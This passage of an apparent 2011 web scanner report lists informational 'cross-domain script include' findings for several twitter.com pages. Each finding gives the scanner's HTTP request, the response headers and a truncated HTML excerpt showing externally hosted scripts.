Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlZjg4ZjYzYWY0%250ANGQ0MjZjNjI4N2Q3M2I2OGFkMWY5NGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--d578dc9e656e00a8d1ae85091ed5cccb5a63114a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.356. http://twitter.com/PageLines/status/27898822361354240

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PageLines/status/27898822361354240

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PageLines/status/27898822361354240 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234593-67061-20661
ETag: "45bc9184d9294d07117e85f741ef7ba9"
Last-Modified: Fri, 28 Jan 2011 17:09:53 GMT
X-Runtime: 0.08058
Content-Type: text/html; charset=utf-8
Content-Length: 13581
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoVaW5fbmV3X3VzZXJfZmxvdzA6%250ADGNzcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--3a233d9d883576ebfa586c9bb6a6cf2c60630138; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.357. http://twitter.com/PhantomGourmet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PhantomGourmet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PhantomGourmet HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266033-91577-32859
ETag: "161ed10fae22588b3ed41cf62918d8a5"
Last-Modified: Sat, 29 Jan 2011 01:53:53 GMT
X-Runtime: 0.00903
Content-Type: text/html; charset=utf-8
Content-Length: 47996
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.358. http://twitter.com/Prucenter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Prucenter

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Prucenter HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-49777-22631
ETag: "6809b20e173abb1f6aa98709f0f9d6dc"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 52276
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.359. http://twitter.com/PureADK

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PureADK

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PureADK HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-9085-29245
ETag: "6ea59f215eff63985173a556c3c58572"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01097
Content-Type: text/html; charset=utf-8
Content-Length: 57696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.360. http://twitter.com/ROBERTPLANT

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ROBERTPLANT

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ROBERTPLANT HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-51236-50087
ETag: "2065838d33813f1ed4f56a5980ac687e"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.02165
Content-Type: text/html; charset=utf-8
Content-Length: 21714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.361. http://twitter.com/RealLamarOdom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /RealLamarOdom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealLamarOdom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266006-7436-1947
ETag: "176880d5a04c3fcd8b68fb306d4172bf"
Last-Modified: Sat, 29 Jan 2011 01:53:26 GMT
X-Runtime: 0.01342
Content-Type: text/html; charset=utf-8
Content-Length: 49980
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.362. http://twitter.com/RobertDuffy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /RobertDuffy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-67311-52082
ETag: "e57068ea600d03f7a7bf890e4a74a917"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01335
Content-Type: text/html; charset=utf-8
Content-Length: 50645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

